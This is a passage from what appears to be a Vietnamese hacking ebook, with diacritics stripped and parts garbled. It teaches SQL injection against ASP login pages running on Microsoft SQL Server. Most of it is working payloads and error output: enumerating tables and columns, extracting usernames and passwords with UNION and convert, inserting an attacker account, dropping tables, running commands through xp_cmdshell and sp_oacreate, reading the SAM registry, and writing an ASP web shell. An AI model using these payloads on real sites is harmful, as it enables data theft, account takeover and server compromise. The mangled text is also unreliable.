and password = '" + password + "'"; trace( "query: " + sql ); rso.open( sql, cn ); if (rso.EOF) { rso.close(); %> <FONT Face='tahoma' color='cc0000'> <H1> <BR><BR> <CENTER>ACCESS DENIED</CENTER> </H1> </BODY> </HTML> <% Response.end return; } else { Session("username") = "" + rso("username"); %> <FONT Face='tahoma' color='00cc00'> <H1> <CENTER>ACCESS GRANTED<BR> <BR>
Welcome, <% Response.write(rso("Username")); Response.write( "</BODY></HTML>" ); Response.end } } function Main() { //Set up connection var username var cn = Server.createobject( "ADODB.Connection" ); cn.connectiontimeout = 20; cn.open( "localserver", "sa", "password" ); username = new String( Request.form("username") ); if( username.length > 0) { Login( cn ); } cn.close(); } Main(); %>
y l cu truy vn SQL:
var sql = "select * from users where username = '" + username + "'and password = '" + password + "'";
nu hacker vo nh sau:
th table 'user; s b xo,v ta c th vt qua bng cch sau:bypass cc bn bit ht ri ti khng ni li na - ( Bn tham kho li Cn bn hack 1 website b li SQL Injection )
create table users( id int, username varchar(255), password varchar(255), privs int )
v insert vo:
insert into users values( 0, 'admin', 'r00tr0x!', 0xffff ) insert into users values( 0, 'guest', 'guest', 0x0000 ) insert into users values( 0, 'chris', 'password', 0x00ff )
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /process_login.asp, line 35
Tip tc ly cc ci cn li:
Username: ' group by users.id having 1=1-Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35
Cho n khi khng cn bo li th dng li , vy l bn bit table v column cn khai thc ri, by gi n i ly gi tr ca n: xc nh ni dung ca column ta dng hm sum()
Username: ' union select sum(username) from users-[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. /process_login.asp, line 35
Username: ' union select sum(id) from users-Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. /process_login.asp, line 35
Vy l ta c th insert vo csdl: Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--
Ly Version ca server:
Username: ' union select @@version,1,1,1-Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int. /process_login.asp, line 35
c th dng convert() nhng ti ch cc bn dng union ,cc bn th c ni dung ca cc user trogn table nh sau:
Username: ' union select min(username),1,1,1 from users where username > 'a'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int. /process_login.asp, line 35
Username: ' union select min(username),1,1,1 from users where username 'admin'-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int. /process_login.asp, line 35
Username: ' union select password,1,1,1 from users where username ='admin'-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int. /process_login.asp, line 35
To mt script nh sau: begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end
Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end--
Tip tc:
Username: ' union select ret,1,1,1 from foo-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int. /process_login.asp, line 35
Xo du vt:
Mt hacker khi iu kin c csdl th h mun xa hn l iu khin h thng mng ca server lun,mt trong s cch :
1-S dng xp_cmdshell khi c quyn 'sa' 2-S dng xp_regread c register,bao gm SAM 3-Chy link query trn server 4-To script trn server khai thc 5-S dng 'bulk insert' c bt c file no trn h thng 6-S dng bcp to qun cho text file trn server 7-S dng sp_OACreate, sp_OAMethod and sp_OAGetProperty to script (ActiveX) chy trn server
[xp_cmdshell]
Chc cc bn cng nghe nhiu ri v d: exec master..xp_cmdshell 'dir' exec master..xp_cmdshell 'net1 user'
[xp_regread]
Cc hm lin quan...
V d:
vv.. cn nhiu th na
[Other Extended Stored Procedures] services: exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server'
create table foo( line varchar(8000) ) tip tc: bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
VD: bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c Slocalhost -Usa -Pfoobar
Dng 'wscript.shell'
vd:
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' Tren cu truy vn:
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--
Dng 'scripting.filesystemobject' c file: declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while( @ret = 0 ) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end
declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>' y l nhng cch bn c th dng rt hiu qu,bn hy sng to thm cho mnh t nhng ch dn c bn ny.
Login page (or any injection page):::: username: ' having 1=1--
KQ: ------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
KQ :--------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. ------------------------------------------Vy l ta c column Vuser
2) UNION nh m hiu qu
username : ' Union select [column] from [table] where [column2=...]-password : everything
Vd: Gi s ta bit 2 column username v password trong table VTABLE cua db victim l VUSER v VPASS th ta lm nh sau
username : ' Union select VPASS from VTABLE where VUSER='admin'-- (1) password : everything
(1) : Trong trng hp ny admin l mt user m bn bit nu khng c th b trng, n s cho bn user u tin
KQ:----------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. ---------------------------------
Nu KQ ra nh trn c ngha l bn phi union thm nhiu column na tt c column ca table VTABLE c Union ht. Structure ca n nh sau:
username : ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1) password : everything
-------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int. --------------------------------
Vng tha cc bn SQL injection tht th v, v y l iu ta c th lm trong bi vit hm nay ca ti : Ly sch database ca i phng.
3) Ly ht value ca mt column bit trong mt table bit B quyt y l Not in Structure ca n nh sau (s dng v d vi column ca bi trc): Vi Vuser l admin ta c th ly c cc user khc
-----Login Page :::::: username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) ------------------------Vng, sau chng ta s thu c thm mt user na v ch vic chn vo trong Not in ( vd: Not in (admin,hacker,.)) c lm tip tc nh th ta s c ht mi user(d nhin sau l mi password).
**** ly danh sch tn cc user theo mt quy nh m bn chn , v d chi ly cc user c cha t admin chng hn ta dng like : cu trc
-----Login Page :::::: username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) like %admin% -------------------------
4) Ly ht table v column ca ca database: B quyt chnh l table ny ca database : INFORMATION_SCHEMA.TABLES vi column TABLE_NAME (cha ton b table) v table : INFORMATION_SCHEMA.COLUMNS vi column COLUMN_NAME (cha ton b column)
-----Login page ::::::: username: UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and ---------------------------
Trn y l nhng iu cn bn nht v SQl injection m ti c th cung cp cho cc bn, cn lm c tt hay khng th phi c mt cht sng to na hy vng n gip ch cho cc bn mt cht khi gp mt site b SQl injection
5) Khng cn UNION: Nu cc bn ngi dng Union v nhng bt tin ca n th cc bn c th dng "Convert" mt cch d dng hn thu thp info qua cc thng bo li
Structure :
---login page::::
Trn l mt v d bn ly version, gi y mun ly bt c info no bn ch cn thay vo ci "select @@version" nhng nh nu l ln u tin get info th thm TOP 1 vo nh
vd: user : ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--
vd: user : ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--
Structure :
vd: '; DROP TABLE VTABLE-Nu cc bn rnh v SQL th c th lm c rt nhiu iu th v qua ci ny , nhng t xin phn cho cc bn t nghin cu nh.
Chm ht cun Ebook. Chc cc bn may mn. Hack ch l hc hi v trao di k nng bo mt. http://thegioiebook.com